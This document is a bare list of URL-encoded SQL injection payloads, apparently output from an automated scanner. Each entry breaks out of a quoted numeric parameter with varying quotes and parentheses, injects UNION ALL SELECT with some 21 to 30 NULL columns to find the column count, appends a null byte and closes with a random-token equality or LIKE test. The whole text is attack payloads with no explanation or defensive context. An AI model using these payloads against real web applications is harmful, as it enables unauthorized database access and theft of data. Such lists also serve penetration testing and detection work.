1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27abEJ%27%3D%27abEJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27sIka%27%3D%27sIka 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27BgIY%27%3D%27BgIY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27eiJO%27%3D%27eiJO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27FFMY%27%3D%27FFMY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27KMwY%27%3D%27KMwY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27pviS%27%3D%27pviS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27UtJB%27%3D%27UtJB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27XaaE%27%3D%27XaaE 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27yJwO%27%3D%27yJwO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27JkvP%27%3D%27JkvP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Ymda%27%3D%27Ymda 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27glUq%27%3D%27glUq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27yLDm%27%3D%27yLDm 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ZJup%27%3D%27ZJup 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27PQlx%27%3D%27PQlx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27AObF%27%3D%27AObF 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27wndd%27%3D%27wndd 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27TAZo%27%3D%27TAZo 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27bCep%27%3D%27bCep 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ugPa%27%3D%27ugPa 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27xYEA%27%3D%27xYEA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27qfhZ%27%20LIKE%20%27qfhZ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27cSJK%27%20LIKE%20%27cSJK 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ZJkA%27%20LIKE%20%27ZJkA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27pWHE%27%20LIKE%20%27pWHE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27sUyL%27%20LIKE%20%27sUyL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27YTah%27%20LIKE%20%27YTah 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27YNbG%27%20LIKE%20%27YNbG 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27QhJk%27%20LIKE%20%27QhJk 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27wBOM%27%20LIKE%20%27wBOM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27omDM%27%20LIKE%20%27omDM 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27edtd%27%20LIKE%20%27edtd 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27yYSa%27%20LIKE%20%27yYSa 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Kilg%27%20LIKE%20%27Kilg 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27dGfQ%27%20LIKE%20%27dGfQ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27CuZG%27%20LIKE%20%27CuZG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qNnn%27%20LIKE%20%27qNnn 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Shta%27%20LIKE%20%27Shta 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27cUko%27%20LIKE%20%27cUko 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27DhtY%27%20LIKE%20%27DhtY 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27BwRa%27%20LIKE%20%27BwRa 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27aJSr%27%20LIKE%20%27aJSr 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27oeRk%27%20LIKE%20%27oeRk 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27lauE%27%20LIKE%20%27lauE 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27TIZH%27%20LIKE%20%27TIZH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27oiLH%27%20LIKE%20%27oiLH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fMdx%27%20LIKE%20%27fMdx 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fjMd%27%20LIKE%20%27fjMd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Dqfd%27%20LIKE%20%27Dqfd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27TziE%27%20LIKE%20%27TziE 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27isux%27%20LIKE%20%27isux 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27kClz%27%20LIKE%20%27kClz 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27LRhU%27%20LIKE%20%27LRhU 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27nbaq%27%20LIKE%20%27nbaq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27KVQv%27%20LIKE%20%27KVQv 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Pmsl%27%20LIKE%20%27Pmsl 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27NdMa%27%20LIKE%20%27NdMa 